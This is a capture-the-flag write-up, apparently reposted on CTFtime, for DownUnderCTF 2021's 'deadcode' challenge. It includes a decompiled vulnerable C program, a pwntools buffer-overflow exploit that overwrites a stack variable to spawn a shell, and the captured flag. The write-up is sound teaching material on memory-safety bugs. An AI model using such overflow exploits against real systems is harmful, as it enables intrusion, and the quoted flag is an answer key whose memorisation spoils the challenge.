CTFtime.org

deadcode

by datajerk / burner_herz0g

Tags: bof pwn 

Rating:

# DownUnderCTF 2021

## deadcode

> 100
>
> I'm developing this new application in C, I've setup some code for the new features but it's not (a)live yet.
>
> Author: xXl33t_h@x0rXx
>
> `nc pwn-2021.duc.tf 31916`
>
> [`deadcode`](deadcode)

Tags: _pwn_ _x86-64_ _bof_ _remote-shell_ _variable-overwrite_

## Summary

Baby BOF. Overwrite variable.

## Analysis

### Checksec

```
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
```

Partial RELRO = GOT overwrite; No PIE = Easy ROP; No canary = Easy BOF.

None of this matters for this challenge.

### Decompile with Ghidra

```c
undefined8 main(void)
{
char local_28 [24];
long local_10;

local_10 = 0;
buffer_init();
puts("\nI\'m developing this new application in C, I\'ve setup some code for the new features but it\'s not (a)live yet.");
puts("\nWhat features would you like to see in my app?");
gets(local_28);
if (local_10 == 0xdeadc0de) {
puts("\n\nMaybe this code isn\'t so dead...");
system("/bin/sh");
}
return 0;
}
```

`gets` is the vuln. To get a shell just set `local_10` to `0xdeadc0de`. Ghidra makes this easy for you. `local_28` is `0x28` bytes from the return address on the stack. `local_10`, is, you guessed it, `0x10` bytes from the return address on the stack. So to overwrite `local_10`, send `0x28 - 0x10` bytes of garbage followed by `0xdeadcode` (as `long`).

## Exploit

```python
#!/usr/bin/env python3

from pwn import *

binary = context.binary = ELF('./deadcode')

if args.REMOTE:
p = remote('pwn-2021.duc.tf', 31916)
else:
p = process(binary.path)

payload = b''
payload += (0x28 - 0x10) * b'A'
payload += p64(0xdeadc0de)

p.sendlineafter(b'?\n',payload)
p.interactive()
```

Output:

```bash
# ./exploit.py REMOTE=1
[*] '/pwd/datajerk/downunderctf2021/deadcode/deadcode'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
[+] Opening connection to pwn-2021.duc.tf on port 31916: Done
[*] Switching to interactive mode

Maybe this code isn't so dead...
$ cat flag.txt
DUCTF{y0u_br0ught_m3_b4ck_t0_l1f3_mn423kcv}
```

Original writeup (https://github.com/datajerk/ctf-write-ups/tree/master/downunderctf2021/deadcode).

Comments